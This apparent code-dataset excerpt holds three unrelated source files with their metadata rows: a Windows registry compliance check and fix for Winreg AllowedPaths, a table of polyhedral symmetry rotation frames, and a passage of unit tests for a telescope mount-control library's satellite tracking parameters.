pcat2py/class/21064964-5cc5-11e4-af55-00155d01fe08.py
|
phnomcobra/PCAT2PY
|
937c3b365cdc5ac69b78f59070be0a21bdb53db0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
################################################################################
# 21064964-5cc5-11e4-af55-00155d01fe08
#
# Justin Dierking
# justindierking@hardbitsolutions.com
# phnomcobra@gmail.com
#
# 10/24/2014 Original Construction
################################################################################
class Finding:
def __init__(self):
self.output = []
self.is_compliant = False
self.uuid = "21064964-5cc5-11e4-af55-00155d01fe08"
def check(self, cli):
# Initialize Compliance
self.is_compliant = True
# Get Registry MultiSZ
multi_sz = cli.get_reg_multi_sz(r'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths', 'Machine')
# Output Lines
self.output = [r'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths', ('Machine=')] + multi_sz
# Recommended MultiSZ
rec_multi_sz = ("Software\Microsoft\OLAP Server,Software\Microsoft\Windows NT\CurrentVersion\Perflib,Software\Microsoft\Windows NT\CurrentVersion\Print,Software\Microsoft\Windows NT\CurrentVersion\Windows,System\CurrentControlSet\Control\ContentIndex,System\CurrentControlSet\Control\Print\Printers,System\CurrentControlSet\Control\Terminal Server,System\CurrentControlSet\Control\Terminal Server\UserConfig,System\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration,System\CurrentControlSet\Services\Eventlog,System\CurrentControlSet\Services\Sysmonlog")
for sz in multi_sz:
if sz.lower() not in rec_multi_sz.lower():
self.is_compliant = False
return self.is_compliant
def fix(self, cli):
cli.powershell(r"New-Item -path 'HKLM:\System\CurrentControlSet\Control\SecurePipeServers'")
cli.powershell(r"New-Item -path 'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg'")
cli.powershell(r"New-Item -path 'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths'")
cli.powershell(r"Set-ItemProperty -path 'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths' -name 'Machine' -Type MultiString -value Software\Microsoft\OLAP Server,Software\Microsoft\Windows NT\CurrentVersion\Perflib,Software\Microsoft\Windows NT\CurrentVersion\Print,Software\Microsoft\Windows NT\CurrentVersion\Windows,System\CurrentControlSet\Control\ContentIndex,System\CurrentControlSet\Control\Print\Printers,System\CurrentControlSet\Control\Terminal Server,System\CurrentControlSet\Control\Terminal Server\UserConfig,System\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration,System\CurrentControlSet\Services\Eventlog,System\CurrentControlSet\Services\Sysmonlog")
| 64.904762
| 721
| 0.74358
| 280
| 2,726
| 7.175
| 0.310714
| 0.22897
| 0.238925
| 0.101543
| 0.764062
| 0.732205
| 0.732205
| 0.732205
| 0.689895
| 0.61324
| 0
| 0.022811
| 0.099413
| 2,726
| 41
| 722
| 66.487805
| 0.795519
| 0.086574
| 0
| 0.105263
| 0
| 0.105263
| 0.730802
| 0.670837
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7f0bc5cd58b733a7d68f070b7eeaefdd1a84b095
| 30,456
|
py
|
Python
|
homog/sym.py
|
bcov77/homog
|
526c3f07c720f76333bc8be0cd64b436015ff509
|
[
"Apache-2.0"
] | null | null | null |
homog/sym.py
|
bcov77/homog
|
526c3f07c720f76333bc8be0cd64b436015ff509
|
[
"Apache-2.0"
] | 104
|
2018-02-02T00:54:14.000Z
|
2022-03-28T11:20:24.000Z
|
homog/sym.py
|
bcov77/homog
|
526c3f07c720f76333bc8be0cd64b436015ff509
|
[
"Apache-2.0"
] | 5
|
2018-02-01T20:34:36.000Z
|
2021-06-22T17:59:30.000Z
|
from homog import *
tetrahedral_axes = {2: hnormalized([1, 0, 0]),
3: hnormalized([1, 1, 1]),
7: hnormalized([1, 1, -1])} # other c3
octahedral_axes = {2: hnormalized([1, 1, 0]),
3: hnormalized([1, 1, 1]),
4: hnormalized([1, 0, 0])}
icosahedral_axes = {2: hnormalized([1, 0, 0]),
3: hnormalized([0.934172, 0.000000, 0.356822]),
5: hnormalized([0.850651, 0.525731, 0.000000])}
tetrahedral_frames = np.array([((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, +1.000000, +0.000000),
(+1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, +0.000000, +0.000000),
(-0.000000, -0.000000, -1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, -0.000000, -1.000000, +0.000000),
(-1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, +1.000000, +0.000000),
(+1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, -0.000000, -1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, -1.000000, +0.000000),
(-1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, +0.000000, -0.000000, +0.000000),
(-0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, +0.000000, -0.000000, +0.000000),
(-0.000000, -1.000000, +0.000000, +0.000000),
(-0.000000, +0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000))])
octahedral_frames = np.array([((+0.000000, +1.000000, +0.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, +1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +1.000000, +0.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, +0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, +1.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, -0.000000, +0.000000),
(+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, -1.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, -0.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, -0.000000, +0.000000),
(-0.000000, -0.000000, +1.000000, +0.000000),
(-1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, -1.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, -1.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +0.000000, -1.000000, +0.000000),
(-0.000000, -1.000000, -0.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, +0.000000, +0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(-0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(-0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, -0.000000, +0.000000),
(-1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000))])
icosahedral_frames = np.array([((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, +0.309017, +0.500000, +0.000000),
(+0.309017, +0.500000, -0.809017, +0.000000),
(-0.500000, +0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, +0.309017, +0.500000, +0.000000),
(-0.309017, -0.500000, +0.809017, +0.000000),
(+0.500000, -0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, +0.309017, -0.500000, +0.000000),
(+0.309017, +0.500000, +0.809017, +0.000000),
(+0.500000, -0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, +0.309017, -0.500000, +0.000000),
(-0.309017, -0.500000, -0.809017, +0.000000),
(-0.500000, +0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, -0.309017, +0.500000, +0.000000),
(+0.309017, -0.500000, -0.809017, +0.000000),
(+0.500000, +0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, -0.309017, +0.500000, +0.000000),
(-0.309017, +0.500000, +0.809017, +0.000000),
(-0.500000, -0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, -0.309017, -0.500000, +0.000000),
(+0.309017, -0.500000, +0.809017, +0.000000),
(-0.500000, -0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, -0.309017, -0.500000, +0.000000),
(-0.309017, +0.500000, -0.809017, +0.000000),
(+0.500000, +0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, +0.809017, +0.309017, +0.000000),
(+0.809017, -0.309017, -0.500000, +0.000000),
(-0.309017, +0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, +0.809017, +0.309017, +0.000000),
(-0.809017, +0.309017, +0.500000, +0.000000),
(+0.309017, -0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, +0.809017, -0.309017, +0.000000),
(+0.809017, -0.309017, +0.500000, +0.000000),
(+0.309017, -0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, +0.809017, -0.309017, +0.000000),
(-0.809017, +0.309017, -0.500000, +0.000000),
(-0.309017, +0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, -0.809017, +0.309017, +0.000000),
(+0.809017, +0.309017, -0.500000, +0.000000),
(+0.309017, +0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, -0.809017, +0.309017, +0.000000),
(-0.809017, -0.309017, +0.500000, +0.000000),
(-0.309017, -0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, -0.809017, -0.309017, +0.000000),
(+0.809017, +0.309017, +0.500000, +0.000000),
(-0.309017, -0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, -0.809017, -0.309017, +0.000000),
(-0.809017, -0.309017, -0.500000, +0.000000),
(+0.309017, +0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, +0.500000, +0.809017, +0.000000),
(+0.500000, -0.809017, +0.309017, +0.000000),
(+0.809017, +0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, +0.500000, +0.809017, +0.000000),
(-0.500000, +0.809017, -0.309017, +0.000000),
(-0.809017, -0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, +0.500000, -0.809017, +0.000000),
(+0.500000, -0.809017, -0.309017, +0.000000),
(-0.809017, -0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, +0.500000, -0.809017, +0.000000),
(-0.500000, +0.809017, +0.309017, +0.000000),
(+0.809017, +0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, -0.500000, +0.809017, +0.000000),
(+0.500000, +0.809017, +0.309017, +0.000000),
(-0.809017, +0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, -0.500000, +0.809017, +0.000000),
(-0.500000, -0.809017, -0.309017, +0.000000),
(+0.809017, -0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, -0.500000, -0.809017, +0.000000),
(+0.500000, +0.809017, -0.309017, +0.000000),
(+0.809017, -0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, -0.500000, -0.809017, +0.000000),
(-0.500000, -0.809017, +0.309017, +0.000000),
(-0.809017, +0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, +0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +0.000000, +1.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(-0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, +0.000000, +0.000000),
(-0.000000, -0.000000, -1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, -1.000000, +0.000000),
(+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, -1.000000, +0.000000),
(-1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, +0.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(-0.000000, -0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, +0.309017, +0.500000, +0.000000),
(+0.309017, -0.500000, +0.809017, +0.000000),
(+0.500000, +0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, +0.309017, +0.500000, +0.000000),
(-0.309017, +0.500000, -0.809017, +0.000000),
(-0.500000, -0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, +0.309017, -0.500000, +0.000000),
(+0.309017, -0.500000, -0.809017, +0.000000),
(-0.500000, -0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, +0.309017, -0.500000, +0.000000),
(-0.309017, +0.500000, +0.809017, +0.000000),
(+0.500000, +0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, -0.309017, +0.500000, +0.000000),
(+0.309017, +0.500000, +0.809017, +0.000000),
(-0.500000, +0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, -0.309017, +0.500000, +0.000000),
(-0.309017, -0.500000, -0.809017, +0.000000),
(+0.500000, -0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, -0.309017, -0.500000, +0.000000),
(+0.309017, +0.500000, -0.809017, +0.000000),
(+0.500000, -0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, -0.309017, -0.500000, +0.000000),
(-0.309017, -0.500000, +0.809017, +0.000000),
(-0.500000, +0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, +0.809017, +0.309017, +0.000000),
(+0.809017, +0.309017, +0.500000, +0.000000),
(+0.309017, +0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, +0.809017, +0.309017, +0.000000),
(-0.809017, -0.309017, -0.500000, +0.000000),
(-0.309017, -0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, +0.809017, -0.309017, +0.000000),
(+0.809017, +0.309017, -0.500000, +0.000000),
(-0.309017, -0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, +0.809017, -0.309017, +0.000000),
(-0.809017, -0.309017, +0.500000, +0.000000),
(+0.309017, +0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, -0.809017, +0.309017, +0.000000),
(+0.809017, -0.309017, +0.500000, +0.000000),
(-0.309017, +0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, -0.809017, +0.309017, +0.000000),
(-0.809017, +0.309017, -0.500000, +0.000000),
(+0.309017, -0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, -0.809017, -0.309017, +0.000000),
(+0.809017, -0.309017, -0.500000, +0.000000),
(+0.309017, -0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, -0.809017, -0.309017, +0.000000),
(-0.809017, +0.309017, +0.500000, +0.000000),
(-0.309017, +0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, +0.500000, +0.809017, +0.000000),
(+0.500000, +0.809017, -0.309017, +0.000000),
(-0.809017, +0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, +0.500000, +0.809017, +0.000000),
(-0.500000, -0.809017, +0.309017, +0.000000),
(+0.809017, -0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, +0.500000, -0.809017, +0.000000),
(+0.500000, +0.809017, +0.309017, +0.000000),
(+0.809017, -0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, +0.500000, -0.809017, +0.000000),
(-0.500000, -0.809017, -0.309017, +0.000000),
(-0.809017, +0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, -0.500000, +0.809017, +0.000000),
(+0.500000, -0.809017, -0.309017, +0.000000),
(+0.809017, +0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, -0.500000, +0.809017, +0.000000),
(-0.500000, +0.809017, +0.309017, +0.000000),
(-0.809017, -0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, -0.500000, -0.809017, +0.000000),
(+0.500000, -0.809017, +0.309017, +0.000000),
(-0.809017, -0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, -0.500000, -0.809017, +0.000000),
(-0.500000, +0.809017, -0.309017, +0.000000),
(+0.809017, +0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000))])
| 75.950125
| 79
| 0.363344
| 3,146
| 30,456
| 3.515575
| 0.0089
| 0.548101
| 0.845118
| 0.688608
| 0.981826
| 0.981826
| 0.980109
| 0.980109
| 0.974503
| 0.974503
| 0
| 0.646809
| 0.450486
| 30,456
| 400
| 80
| 76.14
| 0.014042
| 0.000263
| 0
| 0.956853
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002538
| 0
| 0.002538
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
6152b27defe38f299427b452e534a59d9f96cfe9
| 50,600
|
py
|
Python
|
tests/unit_tests/mountcontrol/test_satellite.py
|
mworion/MountWizzard4
|
4e06b29ec2ef70be40e114b911b7bdf2f858a4b1
|
[
"Apache-2.0"
] | 16
|
2020-01-11T22:32:26.000Z
|
2022-03-31T15:18:14.000Z
|
tests/unit_tests/mountcontrol/test_satellite.py
|
mworion/MountWizzard4
|
4e06b29ec2ef70be40e114b911b7bdf2f858a4b1
|
[
"Apache-2.0"
] | 196
|
2020-01-16T13:56:01.000Z
|
2022-03-29T02:06:51.000Z
|
tests/unit_tests/mountcontrol/test_satellite.py
|
mworion/MountWizzard4
|
4e06b29ec2ef70be40e114b911b7bdf2f858a4b1
|
[
"Apache-2.0"
] | 6
|
2019-12-01T19:39:33.000Z
|
2021-05-27T13:14:20.000Z
|
############################################################
# -*- coding: utf-8 -*-
#
# # # # # # #
# ## ## # ## # #
# # # # # # # # # # #
# # ## # ## ## ######
# # # # # # #
#
# Python-based Tool for interaction with the 10micron mounts
# GUI with PyQT5 for python
#
# written in python3, (c) 2019-2021 by mworion
# Licence APL2.0
#
###########################################################
# standard libraries
import unittest
import unittest.mock as mock
# external packages
from skyfield.api import Angle, load
# local imports
from mountcontrol.satellite import Satellite, TLEParams, TrajectoryParams
from mountcontrol.connection import Connection
from base.loggerMW import setupLogging
setupLogging()
class TestConfigData(unittest.TestCase):
def setUp(self):
pass
def test_azimuth_1(self):
tleParams = TLEParams()
tleParams.azimuth = 10
assert tleParams.azimuth.degrees == 10
def test_azimuth_2(self):
tleParams = TLEParams()
tleParams.azimuth = Angle(degrees=10)
assert tleParams.azimuth.degrees == 10
def test_altitude_1(self):
tleParams = TLEParams()
tleParams.altitude = 10
assert tleParams.altitude.degrees == 10
def test_altitude_2(self):
tleParams = TLEParams()
tleParams.altitude = Angle(degrees=10)
assert tleParams.altitude.degrees == 10
def test_ra_1(self):
tleParams = TLEParams()
tleParams.ra = 10
assert tleParams.ra.hours == 10
def test_ra_2(self):
tleParams = TLEParams()
tleParams.ra = Angle(hours=10)
assert tleParams.ra.hours == 10
def test_dec_1(self):
tleParams = TLEParams()
tleParams.dec = 10
assert tleParams.dec.degrees == 10
def test_dec_2(self):
tleParams = TLEParams()
tleParams.dec = Angle(degrees=10)
assert tleParams.dec.degrees == 10
def test_flip_1(self):
tleParams = TLEParams()
tleParams.flip = True
assert tleParams.flip
def test_flip_2(self):
tleParams = TLEParams()
tleParams.flip = 'F'
assert tleParams.flip
def test_jdStart_1(self):
tleParams = TLEParams()
tleParams.jdStart = None
assert tleParams.jdStart is None
def test_jdStart_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
tleParams = TLEParams(obsSite=ObsSite())
tleParams.jdStart = '100'
assert tleParams.jdStart.tt == 169
def test_jdEnd_1(self):
tleParams = TLEParams()
tleParams.jdEnd = None
assert tleParams.jdEnd is None
def test_jdEnd_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
tleParams = TLEParams(obsSite=ObsSite())
tleParams.jdEnd = '100'
assert tleParams.jdEnd.tt == 169
def test_message_1(self):
tleParams = TLEParams()
tleParams.message = None
assert tleParams.message is None
def test_message_2(self):
tleParams = TLEParams()
tleParams.message = 'test'
assert tleParams.message == 'test'
def test_l0_1(self):
tleParams = TLEParams()
tleParams.l0 = 'test'
assert tleParams.l0 == 'test'
def test_l1_1(self):
tleParams = TLEParams()
tleParams.l1 = 'test'
assert tleParams.l1 == 'test'
def test_l2_1(self):
tleParams = TLEParams()
tleParams.l2 = 'test'
assert tleParams.l2 == 'test'
def test_name_1(self):
tleParams = TLEParams()
tleParams.name = 'test'
assert tleParams.name == 'test'
def test_TP_flip_1(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.flip = None
assert trajectoryParams.flip is None
def test_TP_flip_2(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.flip = 'F'
assert trajectoryParams.flip
def test_TP_flip_3(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.flip = 'x'
assert not trajectoryParams.flip
def test_TP_flip_4(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.flip = False
assert not trajectoryParams.flip
def test_TP_jdStart_1(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.jdStart = None
assert trajectoryParams.jdStart is None
def test_TP_jdStart_2(self):
class ObsSite:
